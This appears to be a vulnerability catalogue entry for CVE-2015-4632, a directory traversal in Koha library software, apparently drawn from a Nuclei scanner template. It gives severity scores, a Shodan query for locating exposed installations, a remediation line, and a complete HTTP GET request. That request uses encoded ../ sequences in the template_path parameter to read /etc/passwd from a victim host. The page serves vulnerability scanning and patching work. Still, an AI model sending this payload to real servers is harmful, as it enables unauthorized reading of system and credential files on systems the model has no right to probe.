| Title | Koha 3.20.1 - Directory Traversal |
|---|---|
| Author | daffainfo |
| Severity | High |
| Impact | An attacker can read or modify sensitive files, potentially leading to unauthorized access, data leakage, or system compromise. |
| Remediation | Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.77745 |
| CVE ID | CVE-2015-4632 |
| CWE ID | CWE-22 |
| Shodan Query | cpe:"cpe:2.3:a:koha:koha" |
| Tags | cve2015 cve lfi edb koha vuln |
Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-4632.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-4632.pcap
N/AN/A